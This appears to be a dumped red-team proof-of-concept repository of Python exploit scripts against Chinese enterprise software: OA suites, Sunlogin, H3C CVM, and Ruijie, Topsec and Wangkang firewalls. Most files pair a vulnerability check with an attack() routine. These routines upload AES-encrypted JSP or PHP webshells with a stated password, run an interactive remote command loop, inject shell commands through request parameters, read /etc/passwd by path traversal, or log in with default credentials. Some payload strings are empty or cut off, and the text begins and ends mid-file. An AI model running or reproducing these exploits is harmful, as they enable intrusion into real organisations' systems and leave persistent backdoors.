is_open(host, port): 6 | s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 7 | try: 8 | s.settimeout(1.5) 9 | s.connect((host, int(port))) 10 | s.shutdown(2) 11 | return True 12 | except: 13 | return False 14 | 15 | def verify(url): 16 | relsult = { 17 | 'name': 'Rsync 未授权访问', 18 | 'vulnerable': False, 19 | 'url': url, 20 | 'port': 873, 21 | 'about': 'https://www.freebuf.com/articles/web/317695.html', 22 | } 23 | timeout = 3 24 | oH = urlparse(url) 25 | a = oH.netloc.split(':') 26 | port = relsult['port'] # rsync默认端口 27 | host = a[0] 28 | if is_open(host, port): 29 | pass 30 | else: 31 | return relsult 32 | payload = b'' # 发送的数据 33 | s = socket.socket() 34 | socket.setdefaulttimeout(timeout) # 设置超时时间 35 | try: 36 | s.connect((host, int(port))) 37 | s.send(payload) # 发送info命令 38 | response = s.recv(1024).decode() 39 | s.close() 40 | if response and '@RSYNCD' in response: 41 | relsult['vulnerable'] = True 42 | return relsult 43 | except: 44 | return relsult 45 | -------------------------------------------------------------------------------- /pocs/ports/sunlogin_rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '向日葵 11.0.0.33162 远程命令执行(CNVD-2022-10270)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | } 11 | 12 | try: 13 | rep = requests.get(url, timeout=3) 14 | if re.search('Verification failure', rep.text): 15 | vurl = urllib.parse.urljoin(url, '/cgi-bin/rpc?action=verify-haras') 16 | rep2 = requests.get(vurl, timeout=3) 17 | cid = re.findall('"verify_string":"([^"]+)"', rep2.text)[0] 18 | relsult['vulnerable'] = True 19 | relsult['url'] = url 20 | relsult['payload'] = vurl 21 | relsult['cid'] = cid 22 | relsult['about'] = 'https://github.com/Mr-xn/sunlogin_rce' 23 | return relsult 24 | else: 25 | return relsult 26 | except: 27 | return relsult 28 | 29 | -------------------------------------------------------------------------------- 
/pocs/ports/zookeeper_unauthorized.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from urllib.parse import urlparse 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'Zookeeper未授权访问', 7 | 'url': url, 8 | 'vulnerable': False, 9 | 'attack': False, 10 | 'about': 'https://www.cnblogs.com/stuka/p/14716926.html', 11 | } 12 | timeout = 3 13 | oH = urlparse(url) 14 | host = oH.netloc.split(':')[0] 15 | port1 = 2181 16 | port2 = 2182 17 | if is_open(host, port1) or is_open(host, port2): 18 | pass 19 | else: 20 | return relsult 21 | try: 22 | if check(host, port1, timeout): 23 | relsult['vulnerable'] = True 24 | relsult['port'] = port1 25 | if check(host, port2, timeout): 26 | relsult['vulnerable'] = True 27 | relsult['port'] = port2 28 | return relsult 29 | except: 30 | return relsult 31 | 32 | 33 | def check(ip, port, timeout): 34 | try: 35 | socket.setdefaulttimeout(timeout) 36 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 37 | s.connect((ip, int(port))) 38 | flag = b'envi' 39 | s.send(flag) 40 | data = s.recv(1024) 41 | s.close() 42 | if 'Environment' in str(data): 43 | return True 44 | except: 45 | return False 46 | 47 | def is_open(host, port): 48 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 49 | try: 50 | s.settimeout(1.5) 51 | s.connect((host, int(port))) 52 | s.shutdown(2) 53 | return True 54 | except: 55 | return False -------------------------------------------------------------------------------- /pocs/redteam/fanwei_e-cology_uploadOperation_fileupload_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '泛微OA E-Cology uploadOperation.jsp 任意文件上传(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 
'http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20uploadOperation.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.html' 11 | } 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 14 | 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc', 15 | } 16 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 17 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 18 | filename = 'test.jsp' 19 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 20 | # shell = '''<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>''' 21 | timeout = 3 22 | vurl = urllib.parse.urljoin(url, '/page/exportImport/uploadOperation.jsp') 23 | payload_data = '''------WebKitFormBoundary6XgyjB6SeCArD3Hc\r\nContent-Disposition: form-data; name="file"; filename="{0}"\r\nContent-Type: application/octet-stream\r\n\r\n{1}\r\n------WebKitFormBoundary6XgyjB6SeCArD3Hc--'''.format(filename, shell) 24 | verify_url = urllib.parse.urljoin(url, '/page/exportImport/fileTransfer/' + filename) 25 | try: 26 | rep = requests.post(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 27 | verify_rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 28 | if verify_rep.status_code == 200 and re.search(randstr1 + randstr2, rep.text): 29 | 
result['vulnerable'] = True 30 | result['verify'] = verify_url 31 | return result 32 | except: 33 | return result 34 | 35 | def attack(url): 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 38 | 'Content-Type': 'application/x-www-form-urlencoded', 39 | } 40 | timeout = 3 41 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 42 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 43 | try: 44 | 45 | return True 46 | except: 47 | return False -------------------------------------------------------------------------------- /pocs/redteam/fanwei_e-cology_verifyquicklogin_loginbypass_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, json 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20VerifyQuickLogin.jsp%20%E4%BB%BB%E6%84%8F%E7%AE%A1%E7%90%86%E5%91%98%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E.html' 11 | } 12 | headers = { 13 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | timeout = 3 17 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 18 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 19 | try: 20 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 21 | json_rep = json.loads(rep.text) 22 | if len(json_rep['sessionkey']) > 0 and json_rep['message'] == "1": 23 | result['vulnerable'] = True 24 | result['sessionkey'] = json_rep['sessionkey'] 25 | return result 26 | except: 27 | return result 28 | 29 | def 
attack(url): 30 | headers = { 31 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 32 | 'Content-Type': 'application/x-www-form-urlencoded', 33 | } 34 | timeout = 3 35 | vurl = urllib.parse.urljoin(url, '/mobile/plugin/VerifyQuickLogin.jsp') 36 | payload_data = 'identifier=1&language=1&ipaddress=x.x.x.x' 37 | try: 38 | rep = requests.get(vurl, timeout=timeout, verify=False, headers=headers, data=payload_data) 39 | json_rep = json.loads(rep.text) 40 | print('[*] 获取到sessionkey', json_rep['sessionkey']) 41 | return True 42 | except: 43 | return False -------------------------------------------------------------------------------- /pocs/redteam/h3c_cvm_fileupload_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': 'H3C CVM 前台任意文件上传漏洞(2022HVV) ', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://mp.weixin.qq.com/s/Oqo-8D6sQltVfq2RfbQdfw', 12 | } 13 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 15 | shell = f'<% out.println("{randstr1}" + "{randstr2}"); %>' 16 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 5)) + '.jsp' 17 | payload = '/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{0}&name=222'.format(filename) 18 | timeout = 5 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 21 | 'Content-Range': 'bytes 0-10/20', 22 | } 23 | vurl = urllib.parse.urljoin(url, payload) 24 | data = '{0}'.format(shell) 25 | verify_url = urllib.parse.urljoin(url, '/cas/js/lib/buttons/' + filename) 26 | try: 27 | rep = 
requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 28 | if rep.status_code == 200 and re.search('success', rep.text): 29 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 30 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 31 | relsult['vulnerable'] = True 32 | relsult['verify'] = verify_url 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | def attack(url): 38 | shell = '<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>' 39 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 5)) + '.jsp' 40 | payload = '/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{0}&name=222'.format(filename) 41 | timeout = 20 42 | headers = { 43 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15', 44 | 'Content-Range': 'bytes 0-10/20', 45 | } 46 | vurl = urllib.parse.urljoin(url, payload) 47 | data = '{0}'.format(shell) 48 | verify_url = urllib.parse.urljoin(url, '/cas/js/lib/buttons/' + filename) 49 | print('[+] exploit loading ......') 50 | time.sleep(2) 51 | try: 52 | print('[+] 开始上传webshell') 53 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 54 | if rep.status_code == 200: 55 | print('[+] 上传成功, 正在检测webshell是否存在?') 
56 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 57 | if rep2.status_code == 200: 58 | print('[*] status_code: 200 , 上传成功!') 59 | print('[*] webshell(冰蝎):', verify_url) 60 | print('[*] 密码: rebeyond') 61 | return True 62 | return False 63 | except: 64 | return False -------------------------------------------------------------------------------- /pocs/redteam/landray_oa_admindo_jndiinject_2021.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib 4 | 5 | def verify(url): 6 | result = { 7 | 'name': '蓝凌OA admin.do JNDI远程命令执行', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'https://mp.weixin.qq.com/s/p1uHhUoUUKi7ESZdWR2nlQ', 11 | } 12 | payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' 13 | timeout = 3 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)', 16 | 'Content-type': 'application/x-www-form-urlencoded', 17 | } 18 | vurl = urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp") 19 | try: 20 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False) 21 | if rep.status_code == 200 and re.search('password', rep.text) and re.search("kmss\.properties\.encrypt\.enabled", rep.text): 22 | result['vulnerable'] = True 23 | return result 24 | except: 25 | return result 26 | 27 | def attack(url): 28 | result = { 29 | 'name': '蓝凌OA admin.do JNDI远程命令执行', 30 | 'vulnerable': False, 31 | 'attack': True, 32 | 'about': 'https://mp.weixin.qq.com/s/p1uHhUoUUKi7ESZdWR2nlQ', 33 | } 34 | payload_data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}' 35 | timeout = 3 36 | headers = { 37 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)', 38 | 'Content-type': 'application/x-www-form-urlencoded', 39 | } 40 | vurl = 
urllib.parse.urljoin(url, "/sys/ui/extend/varkind/custom.jsp") 41 | try: 42 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=payload_data, verify=False) 43 | print("[+] 正在获取加密密码......") 44 | password = re.findall("password = .+", rep.text)[0] 45 | print("[*]", password) 46 | print("[+] 请到 https://www.qtool.net/des 进行解密, 默认密钥: kmssAdminKe") 47 | return result 48 | except: 49 | return result -------------------------------------------------------------------------------- /pocs/redteam/landray_oa_treexml_rce_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '蓝凌OA 未授权RCE(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': True, 9 | 'url': url, 10 | 'about': 'https://mp.weixin.qq.com/s/zV4h5d9DrI7Nm49suSzIWw' 11 | } 12 | cmd = 'whoami' 13 | timeout = 5 14 | headers = { 15 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | payload = '/data/sys-common/treexml.tmpl' 19 | vurl = urllib.parse.urljoin(url, payload) 20 | payload_data = '''s_bean=ruleFormulaValidate&script=try { 21 | String cmd = "%s"; 22 | Process child = Runtime.getRuntime().exec(cmd); 23 | } catch (IOException e) { 24 | System.err.println(e); 25 | }''' % cmd 26 | try: 27 | finger_rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False) 28 | if re.search('参数s_bean不能为空', finger_rep.text): 29 | rep = requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data) 30 | if re.search('公式运行时返回了空值,所以无法校验返回值类型', rep.text) and rep.status_code == 200: 31 | relsult['vulnerable'] = True 32 | relsult['vurl'] = vurl 33 | return relsult 34 | except: 35 | return relsult 36 | 37 | def attack(url): 38 | timeout = 5 39 | headers = { 40 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 41 | 
'Content-Type': 'application/x-www-form-urlencoded', 42 | } 43 | payload = '/data/sys-common/treexml.tmpl' 44 | vurl = urllib.parse.urljoin(url, payload) 45 | try: 46 | print('[+] 开始执行命令,输入exit退出') 47 | while True: 48 | cmd = input('[+] 执行命令(无回显) >') 49 | if cmd == 'exit': 50 | break 51 | payload_data = '''s_bean=ruleFormulaValidate&script=try { 52 | String cmd = "%s"; 53 | Process child = Runtime.getRuntime().exec(cmd); 54 | } catch (IOException e) { 55 | System.err.println(e); 56 | }''' % cmd 57 | try: 58 | requests.post(vurl, headers=headers, timeout=timeout, verify=False, data=payload_data) 59 | except: 60 | pass 61 | print('[*] 命令执行完成! 请结合dnslog平台验证是否成功?') 62 | return True 63 | except: 64 | return False -------------------------------------------------------------------------------- /pocs/redteam/mingyu_fileread_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '安恒明御安全网关 任意文件读取(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | } 11 | timeout = 3 12 | headers = { 13 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ", 14 | 'Content-Type': 'application/x-www-form-urlencoded', 15 | } 16 | payload = '/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd' 17 | vurl = urllib.parse.urljoin(url, payload) 18 | try: 19 | finger_rep = requests.get(url, headers=headers, timeout=timeout, verify=False) 20 | if len(finger_rep.headers['P3P']) > 0: 21 | rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 22 | if re.search('root:.*:0:0', rep.text) and rep.status_code == 200: 23 | relsult['vulnerable'] = True 24 | relsult['verify'] = vurl 25 | return relsult 26 | except: 27 | return relsult 28 | -------------------------------------------------------------------------------- /pocs/redteam/prtg_default_pwd_rce.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': 'PRTG NetWork Monitot default password (后台rce)', 7 | 'vulnerable': False, 8 | 'url': url, 9 | 'about': 'https://www.secpulse.com/archives/113566.html', 10 | } 11 | username = 'prtgadmin' 12 | password = 'prtgadmin' 13 | timeout = 3 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0', 16 | 'Content-Type': 'application/x-www-form-urlencoded', 17 | } 18 | vurl = urllib.parse.urljoin(url, '/public/checklogin.htm') 19 | data = f'loginurl=&username={username}&password={password}' 20 | try: 21 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, allow_redirects=False, verify=False) 22 | if rep.status_code == 302 and 'OCTOPUS' in rep.headers['Set-Cookie'] and 'PRTG' in rep.headers['Server']: 23 | relsult['vulnerable'] = True 24 | relsult['username'] = username 25 | relsult['password'] = password 26 | return relsult 27 | except: 28 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/ruijie_nbr_fileupload.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '锐捷-NBR 任意文件上传(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | } 12 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 4)) + '.txt' 13 | shell = ''.join(random.sample(string.digits + string.ascii_letters, 12)) 14 | payload = '/ddi/server/fileupload.php' 15 | timeout = 5 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 18 | 'Content-Type': 'multipart/form-data; boundary=--------801303113', 19 | } 20 | vurl = 
urllib.parse.urljoin(url, payload) 21 | data = '----------801303113\r\nContent-Disposition: form-data; name="uploadDir"\r\n\r\nupload\r\n----------801303113\r\nContent-Disposition: form-data; name="file";filename="{0}";\r\nContent-Type:text/html;\r\n\r\n{1}\r\n----------801303113--'.format(filename, shell) 22 | verify_url = urllib.parse.urljoin(url, '/ddi/server/upload/' + filename) 23 | try: 24 | rep = requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 25 | if re.search('jsonrpc', rep.text) and re.search(filename, rep.text): 26 | rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 27 | if rep.status_code == 200 and re.search(shell, rep.text): 28 | relsult['vulnerable'] = True 29 | relsult['verify'] = verify_url 30 | return relsult 31 | except: 32 | return relsult 33 | 34 | def attack(url): 35 | print('[+] Exploit loading ......') 36 | filename = ''.join(random.sample(string.digits + string.ascii_letters, 4)) + '.php' 37 | shell = '''''' 63 | payload = '/ddi/server/fileupload.php' 64 | timeout = 20 65 | headers = { 66 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 67 | 'Content-Type': 'multipart/form-data; boundary=--------801303113', 68 | } 69 | vurl = urllib.parse.urljoin(url, payload) 70 | data = '----------801303113\r\nContent-Disposition: form-data; name="uploadDir"\r\n\r\nupload\r\n----------801303113\r\nContent-Disposition: form-data; name="file";filename="{0}";\r\nContent-Type:text/html;\r\n\r\n{1}\r\n----------801303113--'.format(filename, shell) 71 | verify_url = urllib.parse.urljoin(url, '/ddi/server/upload/' + filename) 72 | try: 73 | print('[+] 尝试上传冰蝎webshell ') 74 | requests.post(vurl, headers=headers, timeout=timeout, data=data, verify=False) 75 | print('[+] 上传完成,正在检查是否上传成功?') 76 | rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 77 | if rep.status_code == 200: 78 | print('[*] status: 
200 上传成功!') 79 | print('[*] webshell(冰蝎): ', verify_url) 80 | print('[*] 密码: rebeyond') 81 | return True 82 | print('[-] 未检查到webshell, 手动尝试:', verify_url) 83 | return False 84 | except: 85 | return False 86 | 87 | -------------------------------------------------------------------------------- /pocs/redteam/tongda_oa_qyapp-vote-submit_sqli.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, urllib 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '通达OA sqli-布尔盲注(/mobile/api/qyapp.vote.submit.php)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'method': 'post', 11 | 'position': 'data', 12 | 'param': 'submitData', 13 | } 14 | timeout = 3 15 | headers = { 16 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0', 17 | "Content-Type": "application/x-www-form-urlencoded" 18 | } 19 | payload = '/mobile/api/qyapp.vote.submit.php' 20 | vurl = urllib.parse.urljoin(url, payload) 21 | sqli_data_true = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 995=995),1,2*1e308)","value":"1"}}' 22 | sqli_data_false = 'submitData={"a":{"vote_type":"1","vote_id":"if((select 3353=14451),1,2*1e308)","value":"1"}}' 23 | try: 24 | rep1 = requests.get(vurl, timeout=timeout, verify=False) 25 | if rep1.status_code == 200: 26 | true_rep = requests.post(vurl, headers=headers, data=sqli_data_true, timeout=timeout, verify=False) 27 | false_rep = requests.post(vurl, headers=headers, data=sqli_data_false, timeout=timeout, verify=False) 28 | if len(false_rep.text) > len(true_rep.text) and re.search("请联系管理员", false_rep.text): 29 | relsult['vulnerable'] = True 30 | relsult['vurl'] = vurl 31 | relsult['payload'] = sqli_data_true 32 | return relsult 33 | except: 34 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/tongda_oa_v11-8_apialiphp_fileupload.py: 
-------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re, random, string 3 | import base64,time 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '通达OA v11.8 api.ali.php任意文件上传漏洞', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'about': 'http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.8%20api.ali.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html', 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | filename = "fb6790f7.php" 15 | shell = f' eval(base64_decode($BackData[a])));/*\"}"}\r\n--502f67681799b07e4de6b503655f5cae--' % (bs64_payload) 26 | try: 27 | rep = requests.post(vurl1, headers=headers, timeout=timeout, data=data1.encode('utf-8').decode('latin-1'), verify=False) 28 | if rep.status_code == 200: 29 | rep2 = requests.get(vurl2, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 30 | if rep2.status_code == 200: 31 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, data=data1, verify=False) 32 | if verify_rep.status_code == 200 and re.search(randstr1 + randstr2, verify_rep.text): 33 | relsult['vulnerable'] = True 34 | relsult['verify'] = verify_url 35 | return relsult 36 | except: 37 | return relsult 38 | 39 | -------------------------------------------------------------------------------- /pocs/redteam/topsec_management_rce_2022.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib, re, random, string 3 | 4 | def verify(url): 5 | relsult = { 6 | 'name': '天融信 上网行为管理RCE(2022HVV)', 7 | 'vulnerable': False, 8 | 'attack': False, 9 | 'url': url, 10 | 'about': 
'https://mp.weixin.qq.com/s/s_bv4k92Zz-kZFieKN2Qlg', 11 | } 12 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 13 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | shell = randstr1 + randstr2 15 | payload = '/view/IPV6/naborTable/static_convert.php?blocks[0]=|| echo \''+ shell + '\' > /var/www/html/1.txt%0A' 16 | timeout = 3 17 | headers = { 18 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36', 19 | 'Content-Type': 'application/x-www-form-urlencoded', 20 | } 21 | vurl =url + payload 22 | verify_url = urllib.parse.urljoin(url, '/1.txt') 23 | try: 24 | rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False) 25 | if rep.status_code == 200: 26 | verify_rep = requests.get(verify_url, headers=headers, timeout=timeout, verify=False) 27 | if verify_url.status_code == 200 and re.search(randstr1+randstr2, verify_rep.text): 28 | relsult['vulnerable'] = True 29 | relsult['verify'] = verify_url 30 | return relsult 31 | except: 32 | return relsult -------------------------------------------------------------------------------- /pocs/redteam/wangkang_firewall_rce_2021.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re, time 3 | import urllib, random, string 4 | 5 | def verify(url): 6 | relsult = { 7 | 'name': '网康科技-下一代防火墙前台 RCE(2022HVV)', 8 | 'vulnerable': False, 9 | 'attack': True, 10 | 'url': url, 11 | 'about': 'https://www.jianshu.com/p/88a69b3b17b6', 12 | } 13 | randstr1 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 14 | randstr2 = ''.join(random.sample(string.digits + string.ascii_letters, 4)) 15 | shell = f'' 16 | filename = 'test.php' 17 | payload = '/directdata/direct/router' 18 | timeout = 3 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 21 | 'Cookie': 
'PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A', 22 | } 23 | vurl = urllib.parse.urljoin(url, payload) 24 | payload_json = { 25 | "action": "SSLVPN_Resource", 26 | "method": "deleteImage", 27 | "data": [{ 28 | "data": [f"/var/www/html/b.txt;echo '{shell}'>/var/www/html/(unknown)"] 29 | }], 30 | "type": "rpc", 31 | "tid": 17 32 | } 33 | verify_url = urllib.parse.urljoin(url, filename) 34 | try: 35 | rep = requests.post(vurl, headers=headers, timeout=timeout, json=payload_json, verify=False) 36 | if rep.status_code == 200 and re.search('SSLVPN_Resource', rep.text): 37 | 38 | rep2 = requests.get(verify_url, timeout=timeout, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'}, verify=False) 39 | if rep2.status_code == 200 and re.search(randstr1 + randstr2, rep2.text): 40 | relsult['vulnerable'] = True 41 | relsult['verify'] = verify_url 42 | return relsult 43 | except: 44 | return relsult 45 | 46 | def attack(url): 47 | shell = '''''' 48 | filename = 'test.php' 49 | payload = '/directdata/direct/router' 50 | timeout = 3 51 | headers = { 52 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0', 53 | 'Cookie': 'PHPSESSID=e3ctlj1s8b5oblktckrk4anjh7; ys-active_page=s%3A', 54 | } 55 | vurl = urllib.parse.urljoin(url, payload) 56 | payload_json = { 57 | "action": "SSLVPN_Resource", 58 | "method": "deleteImage", 59 | "data": [{ 60 | "data": [f"/var/www/html/b.txt;echo '{shell}'>/var/www/html/(unknown)"] 61 | }], 62 | "type": "rpc", 63 | "tid": 17 64 | } 65 | verify_url = urllib.parse.urljoin(url, filename) 66 | print('[+] Exploit loading ......') 67 | time.sleep(3) 68 | try: 69 | print('[+] 尝试上传蚁剑webshell') 70 | rep = requests.post(vurl, headers=headers, 